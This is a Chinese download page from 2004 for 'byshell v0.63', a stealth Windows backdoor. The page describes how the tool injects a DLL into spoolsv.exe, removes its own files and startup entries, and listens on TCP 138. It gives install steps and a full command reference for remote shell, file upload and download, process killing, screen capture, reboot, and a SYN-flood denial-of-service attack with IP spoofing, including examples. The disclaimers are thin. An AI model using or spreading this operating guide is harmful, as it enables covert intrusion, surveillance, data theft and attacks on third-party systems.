| 软件名称: |
byshell063.rar |
| 文件类型: |
|
|
| 界面语言: |
简体中文 |
| 软件类型: |
国产软件 |
| 运行环境: |
WinNT/2K/Xp |
| 授权方式: |
共享软件 |
| 软件大小: |
67K |
| 软件等级: |
★★★★☆ |
| 发布时间: |
2004-12-29 |
| 官方网址: |
http://xfocus.net 作者:baiyuanfan |
| 演示网址: |
|
| 软件说明: |
|
那个byshell0.64的网络传输稳定性不是很好,因此把前一个版本的0.63也放上来了。
大家如果发现0.64不能用,可以试试这个。
byshell:v0.63
author:"by"
byshell v0.63,用户态实现无进程无DLL无硬盘文件无启动项的后门程序。利用线程注射DLL到系统进程,解除DLL映射并删除自身文件和启动项,关机时恢复。大量的借鉴和学习了农民的cmdbind2的思想,在这里对农民前辈无私共享的精神致以120分感谢。目前把后门绑在TCP138,以后会改成无连接或端口复用的:)原代码和注释写的比较凌乱,和本人的不好的程序风格有关,望大家谅解:(作者允许此软件及其源代码自由传播,但引用时应注明原出处。在联系作者并得到同意之前,不得将此软件改编或删选后用作商业用途,但可用作学习和私人用途。
本软件仅仅支持NT以上的Wind0wZ系统。第一次使用时,在服务端把ntboot.exe和ntboot.dll放在同一目录下,执行 ntboot.exe -install,安装完成后安装文件可以删除。以后当服务端上网,byshell会注射到spoolsv.exe中,可以自行修改原码改变注射的进程名。
符号#是这个软件的命令提示符。目前支持的命令:
cmd 在此后跟你要执行的cmd命令,注意:只能执行一条单独的命令。仅仅支持NT以上的Wind0wZ系统。
eg. #cmddir c:\winnt
shell 输入此命令后,进入交互的远程cmd,直到键入endshell返回#提示符。仅仅支持NT以上的Wind0wZ系统。
endshell 从shell状态返回#提示符。
chpass 改变后门密码。默认为“by”。
eg. #chpass123456
byver 查看连接的服务端的版本,新旧版本的客户服务端间交互时,可能有严重的兼容性问题。
sysinfo 取得对方的基本系统信息。
pslist 对方进程列表。
pskill 杀死对方指定进程。在此后跟你要杀死的进程的PID(由pslist得到)。
eg. #pskill972
modlist 对方指定进程加载的所有DLL的列表。在此后跟你要查看的进程的PID(由pslist得到)。
eg. #modlist972
get 在此软件的连接上下载远程文件。命令格式:
get <tab键> 本地保存文件名 <tab键> 远程下载文件名
eg. #get c:\download\file.txt d:\sourcefile.txt
put 在此软件的连接上向远程上传文件。命令格式:
put <tab键> 远程保存文件名 <tab键> 本地上传文件名
eg. #put d:\receive\file.txt c:\sourcefile.txt
reboot 重启对方机器。
dettach 解除byshell的重启,下次重启就不会有byshell了。
screen 远程截屏到本地保存为c:\remotedesktop.bmp。查看此文件可监视远程屏幕。(似乎在0.63以后的版本不能使用,我不太明白原因,哪位高手如能指教非常感谢)
搞笑功能,开怀一笑:
popmsg 弹出信息框。
eg. #popmsghello,are you all right?
swapmouse 远程鼠标左右键交换。
storemouse 远程鼠标左右键复原。
警告:以下的SYN功能有一定的危险性,仅仅用做测试。如果用户非法使用此功能攻击合法站点,将自己承担全部法律后果。
SYN 使用服务端发起SYN洪水的拒绝服务攻击测试。
参数:SYN 测试对象 测试的分钟数 IP伪造类型(可选参数,0是完全伪造,1是C段伪造,2是不伪造,默认为0) 发包频率(默认100个休息1ms) 攻击对象端口(可选参数,默认为80WWW端口) 使用的端口(可选参数,0是随机变化,默认为0)
如果选择了某个可选参数,那么在它左边的可选参数就必须被选择,在它右边的可选参数则可以忽略。
eg. #SYN 172.18.1.5 15
eg. #SYN 172.18.1.5 15 1
eg. #SYN 172.18.1.5 15 1 1000 445 12345
queryDOS 查询服务端SYN攻击测试的详细情况。
endDOS 强制结束服务端的SYN作业。
由于作者是初学者,水平有限,程序一定存在很多BUG。谢谢各位朋友、前辈指教:
华东师大软件学院04级 baiyuanfan@163.com
特别感谢在我写这个小软件时给了我很大帮助的gxisone(谷夕),glacier(黄鑫)和xfocus.net的所有朋友,是他们的支持使我这个初学者能够克服困难和疑惑,最终完成这个程序。 |
|
| 下载地址: |
进入下载地址列表
|
| 下载说明: |
☉推荐使用网际快车下载本站软件,使用 WinRAR v3.10 以上版本解压本站软件。
☉如果这个软件总是不能下载的请点击报告错误,谢谢合作!!
☉下载本站资源,如果服务器暂不能下载请过一段时间重试!
☉如果遇到什么问题,请到本站论坛去咨寻,我们将在那里提供更多 、更好的资源!
☉本站提供的一些商业软件是供学习研究之用,如用于商业用途,请购买正版。 |
|
[ 推荐]
[ 评论(0条)] [返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
